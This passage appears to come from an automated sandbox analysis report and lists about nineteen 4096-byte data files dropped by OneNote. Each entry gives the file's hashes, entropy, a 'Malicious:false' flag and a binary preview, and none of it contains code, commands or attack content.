                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.0937618481190245
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lsPNffsIvlddLMEZX09uj2TN6RpS4gGfM5ky61E:lsBsMdLpZX09uj2J6RpS4b6
                                                                                                                                                                                                              MD5:6B887838BD51F33A9D365B7BDB988C5A
                                                                                                                                                                                                              SHA1:23395547E86CD0A0B34AF324959ABE9AD8573A78
                                                                                                                                                                                                              SHA-256:C5C7941A519C5509DF99CA347FFE12796B932781B8E1D3EE278220E7F680A4C8
                                                                                                                                                                                                              SHA-512:3345375F8E61DF4C3A982416754DA2C64549F6EBBF0E1DC43A4850FFEA4CA7711C1220984AEE6F64ED4CA574D504CDB084D69BFD482FCEB99CC215E959A6AC76
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ..$.......$.k.M.....`..$.k.M.....`..$..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............7..,).5q.6...l....N...^.................(...*A..L..,j.........f........................................I.qk..B.....LZ.............7..,).5q.6...l.........7..,).5q.6...l...........$.......$.......$...........................................$j......$T.]....$.......$..B....$H......$..B....$..>.)..$..J...................;........4...4...4.."................$...$...$..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........$.......$....#..$............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.051948022741657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:Iw53s84QvUuGPzmtBFa8t78EdDXQ9gwUZTo8rddrPINdX7T4lkVPZ1p4A0Lta:Iw53sX4GPzmpaO78E5XQ9yZTRRRGgKM
                                                                                                                                                                                                              MD5:3DD8E91B7A1AC36572101938DC20947F
                                                                                                                                                                                                              SHA1:102776EBFB479EA2E77955A06737D5B86AF9BEEE
                                                                                                                                                                                                              SHA-256:75E78DC74557080A35AB23CBBBDE65B2D10A41687EC0379EA009EE676DD166A3
                                                                                                                                                                                                              SHA-512:9FE2BB87C27B1F8D1EA6BFE28620640FB268DCC34F8282A25E941E085F91CA20CD06557BA4838DF3D02275D7BEB1233918C8F3838EEB8E452A9C4CA8224AADE2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......&...v.......................................................................................................................................2...>...........v...N............................I.......I.qk..B.....LZ.Z0......Z0..........g..Z0..........g..Z0..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............4x{.o.5....lY.....N...^................H.R.K.BJ...Bo........f........................................I.qk..B.....LZ.............4x{.o.5....lY..........4x{.o.5....lY...........Z0......Z0......Z0..........................................Z0j.....Z0T.]...Z0......Z0..B...Z0H.....Z0..B...Z0..>.).Z0..J...................;........4...4...4.."...............Z0..Z0..Z0..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........Z0......Z0....#.Z0............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.146317868517969
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:msX6jMR06E93gXhx3g9piTARvORPdrf4:msXQMRMSXhG9piMRvO
                                                                                                                                                                                                              MD5:DFC466A6F2E20EC9C8D0875144E5AB2A
                                                                                                                                                                                                              SHA1:C253818A3A2A02BC65882A8CB03961342946C791
                                                                                                                                                                                                              SHA-256:378E722D767DF0F84126B6C2DEC1D62D40AE39275EEB833FD3586F0BF1C8B280
                                                                                                                                                                                                              SHA-512:E89C89ECF0BDD8639125E3B544E8101C46AB25E22B84F4CD4DA905FD1AAFE32AC89EB9452DFBB6F04DFF1662387E5C1EFC4ED383F6FE3D2ED559AE8F3B1D9892
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZRT>.....RT>....6aK..L.2RT>....6aK..L.2RT>..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............fM^..4..0+.}s..`....N...^................v...;.A......K........f........................................I.qk..B.....LZ............fM^..4..0+.}s..`........fM^..4..0+.}s..`.........RT>.....RT>.....RT>.........................................RT>j....RT>T.]..RT>.....RT>..B..RT>H....RT>..B..RT>..>.)RT>..J...................;........4...4...4.."..............RT>.RT>.RT>..z...y.. x.. ...........$........4......7...7........................;........4...4...4.........RT>.....RT>....#RT>............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.159214857120181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:msG7rPd7nO7ROTqp/tjstAtMEPlORXk9nb1gToSrdQrSnZIIdXYzg7nO737aO7f5:msHOTqp/5jMEPsXk9KTXRIeu
                                                                                                                                                                                                              MD5:EA4C8B69E3D873182AA809D6244DF287
                                                                                                                                                                                                              SHA1:1B6B3EDCD2F7A81CAA351DB5EB59849DB7564105
                                                                                                                                                                                                              SHA-256:CF35D64B500C3D459CB54892C317F691ADD6972AEFE9628B8560B3ACB2338FE8
                                                                                                                                                                                                              SHA-512:7CC94699AB2F19BDECF550A7379C5960DAC9C9DE6D122E9D5C035D87F8439E8DF5CE38BC36B6A2A77BD6352616E42F24E4DB65CDD227D16E275FBD3520C35FDA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ.*i......*i^@....{....4.*i^@....{....4.*i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................<.7.&.X.K.....N...^.................N}.|.J..i;.Ovf........f........................................I.qk..B.....LZ.................<.7.&.X.K..............<.7.&.X.K...........*i......*i......*i..........................................*ij.....*iT.]...*i......*i..B...*iH.....*i..B...*i..>.).*i..J...................;........4...4...4.."...............*i..*i..*i..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........*i......*i....#.*i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.127468922388431
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:psJuBoLAH+tQBWEBAC+rBgXrg9nXToArdSrLP9eIhdX3FcyfaRFNR:ps7AH+5EBA7KX09XTpRKb9RLXq
                                                                                                                                                                                                              MD5:FF5A05A37FC0D43AE5CA9DCC08D0E19A
                                                                                                                                                                                                              SHA1:B5A3500C62E2BC6A4E8A929A79AEECB34806F4D9
                                                                                                                                                                                                              SHA-256:95FD4B4DE2CD78948991B44E2E1E355B2583E55D385FD48CF8EC8D5AE08D6FC9
                                                                                                                                                                                                              SHA-512:A146C0C2C6A475E79D06EE79A9AC849ABCB87A261744F32F8C759427C4C09C6231271A798E5F87833E24B847AB960F8F69FA824EF7BB1E3FD8F430024FD1D575
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ .l..... .lNr...-d...... .lNr...-d...... .l..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............*...iK..2~X=Ze.q....N...^..................6..C.^.h..%........f........................................I.qk..B.....LZ............*...iK..2~X=Ze.q........*...iK..2~X=Ze.q......... .l..... .l..... .l......................................... .lj.... .lT.].. .l..... .l..B.. .lH.... .l..B.. .l..>.) .l..J...................;........4...4...4..".............. .l. .l. .l..z...y.. x.. ...........$........4......7...7........................;........4...4...4......... .l..... .l....# .l............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.093281951632501
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:viGBsFvVB6DM8E7lXs9CTKRKctVa/iEk:9sN6QZZXs9CWRKc
                                                                                                                                                                                                              MD5:E7A859B659FB1BEAB28ACF7ABCDA462C
                                                                                                                                                                                                              SHA1:027D60533640C7D2C6A9CBA03698C0470CD8E3C0
                                                                                                                                                                                                              SHA-256:44F67F18BCB3C9A2F2AEE4E7C184AAC2B2D33F9BD5BFD7535F9C9C59AFC596D9
                                                                                                                                                                                                              SHA-512:B1E000ABB84906F02FDF9470F07D21576455F806418F491DC0792236066C3A359083F99FF3FD55BE0EC64EE55D62DDBC6934D9F6ED4D39702462FB507D41EECE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R.......................................K......0uFR.I.......I.qk..B.....LZ....K......0uFR.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............A...k....4.,......N...^...............R..*U.kB.=+v............f........................................I.qk..B.....LZ..............A...k....4.,............A...k....4.,..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.09877784776967
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:9suDy9vI5tMOEEC/hXk9ngTolrdSrvIaF7dXOAXcn/sh:9sj9vI5hEEsXk9gT4RKB7tM/s
                                                                                                                                                                                                              MD5:C6715DC18562D66324B7DF71E4D38EA3
                                                                                                                                                                                                              SHA1:92B12AC81BB5A2B954260EEE2E9C268BAC229A22
                                                                                                                                                                                                              SHA-256:37185BCA16012511672DB7EFF667D412EBECCD5E70B4E608F653FFFDAF4CA733
                                                                                                                                                                                                              SHA-512:8A6548EC28BC0A059CCDA643E8C61719EEEB697925B358926D5FD5FAA356B5A045C4E247B9250ECE2E51028B1B2660838E3541CD5E4A93B24DD58D8664395ABB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..............%.1.............%.1............I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L....,w.LFr......N...^...............-+@..C.O.a..............f........................................I.qk..B.....LZ..............L....,w.LFr............L....,w.LFr..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.075065799255672
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FsjvTMUvTcvTMlA1iiE25X89jcTQRK2JvTcvTHvTdvTvvTVvTMlc:Fsj1AiAIPuX89jcMRK2JATBrZx
                                                                                                                                                                                                              MD5:422325F3D8AE0DAD6354A95F471A2F14
                                                                                                                                                                                                              SHA1:32D8443F11300ADB99A11D1D25C249184EB2F1D7
                                                                                                                                                                                                              SHA-256:E89C3AA790AF18C81F55EC798F0DA57593735281170C35428D6F7A06EBC2444D
                                                                                                                                                                                                              SHA-512:F9589F07014909581F29D6E53DEF04A11B4CC2269CECAEC397242BFE36486B499A3E861E482A17C6C9173CF3245DEDD04335352ACC85D37973072D1BE1997548
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ$.......$..Q_......7.+.$..Q_......7.+.$....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.M......x!Yy.$....N...^...............<e...H.M..=\.:2.........f........................................I.qk..B.....LZ.............f.M......x!Yy.$.........f.M......x!Yy.$.........$.......$.......$...........................................$..j....$..T.]..$.......$...B..$..H....$....B..$....>.)$....J...................;........4...4...4.."..............$...$...$....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........$.......$......#$..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.066620834925117
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:BoYsu1yZKYenWtI+EG9CCZvX89H/IrTobrdSrFIodXw0nIeY8rR:BoYsrIYeWlEifX89grTmRKZLc8r
                                                                                                                                                                                                              MD5:CF00C90F6F545B877026A4BE7197B052
                                                                                                                                                                                                              SHA1:19D7DE4E42E26961644F52967A8B3C8AE77B9FF5
                                                                                                                                                                                                              SHA-256:05AB8BD3E851735DE3369E16A16EF8FF12680DC26AFB1B71D59160A0331B4B24
                                                                                                                                                                                                              SHA-512:1C50DB3F3434EA4985A48E77F82DE002597350C31B25247E06A2C3EC18B28DDBDC89DA12B1D6EAF7245D927C290B37147345019608CFCEF1F5846EE53D764037
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.FL......FL.......P...c..FL.......P...c..FL..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e...n...a..E0.....N...^...............e..e. .F.&.[.2..........f........................................I.qk..B.....LZ..............e...n...a..E0...........e...n...a..E0...........FL......FL......FL..........................................FLj.....FLT.]...FL......FL..B...FLH.....FL..B...FL..>.).FL..J...................;........4...4...4.."...............FL..FL..FL..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........FL......FL....#.FL............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.116922369928255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1sss5d579E1SKXFK9xTTRKSJ3ISW3Baw:1sv5WrX49xHRKS
                                                                                                                                                                                                              MD5:06DFD40630632857DD4B4089C83918F6
                                                                                                                                                                                                              SHA1:FA40906C5DF9BE4FFB4E2DAA36C9D4E7140B91A7
                                                                                                                                                                                                              SHA-256:35F9FE0F6E90FDFA050F232E71DE7F265F169BC20C0075184575ADFB029B1180
                                                                                                                                                                                                              SHA-512:7804E8611EBD5B745B014A49AA7B57A5D02DBE0B83A41A139658E816FDFA5AAA7F5B602E14D11D318674753AEF53BD91F057A8F8B049EA97FC9C6ED140D3D2CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..4.......4a>....s.&...]..4a>....s.&...]..4..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............c..G...@...m......N...^...............er..8..O......D&........f........................................I.qk..B.....LZ..............c..G...@...m............c..G...@...m.............4.......4.......4...........................................4j......4T.]....4.......4..B....4H......4..B....4..>.)..4..J...................;........4...4...4.."................4...4...4..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........4.......4....#..4............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.105837325143466
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2vTMsHgXmG2teNtwl+EmCK5X89vTxToKrdSrAII2dXhUm0B6BvmN/pj:GTMslxt4NEmXX89v9TXRKJs
                                                                                                                                                                                                              MD5:F563D3FEC3110F3F2CF0A4388FAB4499
                                                                                                                                                                                                              SHA1:E7AFA0B95644B968AF6CD73447FC2E0F1896072A
                                                                                                                                                                                                              SHA-256:483FA68F24CBEEE1A97C89BAC2B828978AF2EE38FC667A9A945DAA54903BC216
                                                                                                                                                                                                              SHA-512:8D1DB54585EF29F1CFC294DE4001D4EDB863872D2587A70A31D2B245ED8645EED5E1B3F976AE5652613BC23634A9464FD123B47A37079B4BD128752B08110D54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ............e....h7.'..A....e....h7.'..A.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...................."&.aO......N...^...............K..f.Z.H......z.........f........................................I.qk..B.....LZ..................."&.aO................."&.aO..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.07657314646393
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:K4s5pCTnIFtoOs8ElCC5gXA9DGxaTolrdSrKITedXe10QG7pkOx:K4sGzIFuOtElCLXA9DnTMRK2bl5
                                                                                                                                                                                                              MD5:6127379D4338A1336210574285BA4467
                                                                                                                                                                                                              SHA1:444DE125E19492C8B4881CCA616034D091D12A9C
                                                                                                                                                                                                              SHA-256:095BD651AC7FEC82A2073273F289F250434A8E6CED31E61483A5FA7E09FC7590
                                                                                                                                                                                                              SHA-512:125742705BD4B0954B36C97DEDE3AEBE72FDCF31253CAE884819D7F4F77C0D8EBD061272AEDC37040BC3FAF1FA845BFC5E86DA855851DAB473FDEBF92DE6C75C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.o.......o.:P....7.I...o.:P....7.I...o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................n.Z.......I$....N...^................<=..2QC.q.H4.]........f........................................I.qk..B.....LZ...............n.Z.......I$...........n.Z.......I$..........o.......o.......o...........................................o.j.....o.T.]...o.......o..B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.129723906765099
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KIssjeF9mNuzoE6c74dXod936E6T3RK4rejtnBt:Hsv988VDoX493637RK4
                                                                                                                                                                                                              MD5:5FD2F3B8BF1A31D998761362A09024A5
                                                                                                                                                                                                              SHA1:1837EE901C35CC3D9D40C43CCE0BA152EC952568
                                                                                                                                                                                                              SHA-256:6B527CDAD31EDA422DBAB91A02C3342CA779E2CAD2B65A318FB97BD9EEA6E202
                                                                                                                                                                                                              SHA-512:DB9AE07469E0CA4163894716956BCD79D0E32DA7AC66AAE98D76487452555B014D634D34E5FD9C42B0CA6A79BDB05B38FEBAF162BE5D4CF29B8BF1364BDEA1F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.......?..+.7.m.Q...?..+.7.m.Q.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............F..|...9..F.Z.....N...^...............B..y.I.%x.+{.2........f........................................I.qk..B.....LZ..............F..|...9..F.Z...........F..|...9..F.Z.................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4......7...7........................;........4...4...4....................#.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.124330466954773
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Q1Cg7sx8E2dMFEPkWXlW9QDeToJRKg98L8F8i8I8L8OJ868:uCg7sx8E2zFXI9QDe0JRKg98L8F8i8IL
                                                                                                                                                                                                              MD5:0327E898020AE5A0C19636FD82D35FAB
                                                                                                                                                                                                              SHA1:43FA9525A31DD529E72829E666349623BC0388E9
                                                                                                                                                                                                              SHA-256:7EDA8193A29061E5A52D3F3C41DEF3B19E19F537092E97C1136053C478351FB2
                                                                                                                                                                                                              SHA-512:4DAAF2BD2592F046F4BF718238D7A26CE39B862CA21D464058524EB48839A17AB5327D111C10AC4B9569F1C1390F050CA232E1F5F44DF8ADA2AFAC8C0107881F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZ.I^......I^...>........N.I^...>........N.I^..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3..3.....B.^.......N...^...............$2.....K....T...........f........................................I.qk..B.....LZ............3..3.....B.^...........3..3.....B.^.............I^......I^......I^..........................................I^j.....I^T.]...I^......I^..B...I^H.....I^..B...I^..>.).I^..J...................;........4...4...4.."...............I^..I^..I^..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........I^......I^....#.I^............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.163366622102169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:f/ZswnIBp0tiReEVC/ZLXsL9RB9dvTogrdSriIVdX7hYz4cxwU:f/ZsnBp0ZEVAXg9n9VTZRKJoT
                                                                                                                                                                                                              MD5:E08A2458A868C64D5FD10E9ACAA041FF
                                                                                                                                                                                                              SHA1:C11067296F9CB822458955F1A83F3EEE67C3D84F
                                                                                                                                                                                                              SHA-256:EF04D708F1843508B5B0F80EC50675F9C0B36EAA8ABE5AE1724D5687CB6C7383
                                                                                                                                                                                                              SHA-512:539AB4155D8A78BABD7998558AE12E55098B5A68D6594F02556799D36B6E3DB077717AF03AD294BB170487C3053CB640E9EB621AF85C042595D532EE72E9DA1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZR.......R..?U./.$..>. .pR..?U./.$..>. .pR....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3/.N.]...+..j..~....N...^...............h.^...A......I.........f........................................I.qk..B.....LZ............3/.N.]...+..j..~........3/.N.]...+..j..~.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........R.......R......#R..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.127595794230619
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1sqpbz1/2dMt+B6EsWCjtAX49H1To6rdSrhIHdXdwxEzv6/V:1sndMBEsWM6X49VTfRK+sYK
                                                                                                                                                                                                              MD5:55FBC84CB0CE1BC9B9F23785CD0D0914
                                                                                                                                                                                                              SHA1:BB68DD568B43C4E1D79AA3E6A93D63A495DE8CD4
                                                                                                                                                                                                              SHA-256:E2C233A2524D5EF0AE5BA2D5749C6DEF2BAD65FE1CC0094D7885047E86948CA2
                                                                                                                                                                                                              SHA-512:5BEEEE4B7D0C68CE98436881B98409787DBA807242423F51CE050E1BF12DC7C5793BCA646A4B452915C0EC2535B2B0278FC833E27E988371AF24A7CC6198F9A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.>.......>..9....]fq.....>..9....]fq.....>...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............mH^.................N...^...............JAz...O....-...........f........................................I.qk..B.....LZ............mH^.....................mH^.......................>.......>.......>...........................................>.j.....>.T.]...>.......>...B...>.H.....>...B...>...>.).>...J...................;........4...4...4.."...............>...>...>...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........>.......>.....#.>.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.123987105471665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dsHIO6KiOxZER3ceBX8B9r7OT2RKgPOXYfN7:dsHIOWOsxHX49rCSRKgPOXYfN
                                                                                                                                                                                                              MD5:93A0A991E9B32FC394BC03E27F1FE64C
                                                                                                                                                                                                              SHA1:9AD2A53D991055AC963064BFB4D67A994E413A86
                                                                                                                                                                                                              SHA-256:1B755438A663A98EE922B72D22FD547433C1D6583B534DF48D232B03E41BDB81
                                                                                                                                                                                                              SHA-512:8F2C7770B05A79F37A29136740113E4914B8B6FFEB0E5E20FB2D31547F879387D8FCCE3D930D357C6CDDCF8870ED8A5770DBF7B5E73F8236D7E6B11DD670A9FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZk.......k..[......3...>.k..[......3...>.k....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............9...".R.:$..V.......N...^..................T(..F..$...#........f........................................I.qk..B.....LZ............9...".R.:$..V...........9...".R.:$..V............k.......k.......k...........................................k..j....k..T.]..k.......k....B..k..H....k....B..k....>.)k....J...................;........4...4...4.."..............k...k...k....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........k.......k......#k..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.136310870891384
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lsxW8gomiENA1s2jXM9k3TwRKsfYeB0l:lsw8gJPyjXM9w8RKsQ
                                                                                                                                                                                                              MD5:13EBA19571C81E7F1FCB434B7697BB68
                                                                                                                                                                                                              SHA1:D98558758A44C57A51B54CCE22D74C8ED80789E8
                                                                                                                                                                                                              SHA-256:74589B31E9EFB47FFB989F1AA8175591C8C43AF799F5FE0CD62DA0F8534CEC5A
                                                                                                                                                                                                              SHA-512:1BD8B696257C4EB386FE19A8C9BA70EE9D473D8FCE06F65B1C8C3A9956CDD33AF4A15AEA509BBFEB39F0D21B479C31E8AF08E1EF3637851B4A4C920EA557B654
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZQ.......Q..6.>>.7]......Q..6.>>.7]......Q....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................o....m]....N...^................j..|P@..{CF.V.........f........................................I.qk..B.....LZ....................o....m]................o....m].........Q.......Q.......Q...........................................Q..j....Q..T.]..Q.......Q...B..Q..H....Q....B..Q....>.)Q....J...................;........4...4...4.."..............Q...Q...Q....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Q.......Q......#Q..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.077246154430585
                                                                                                                                                                                                              Encrypted:false
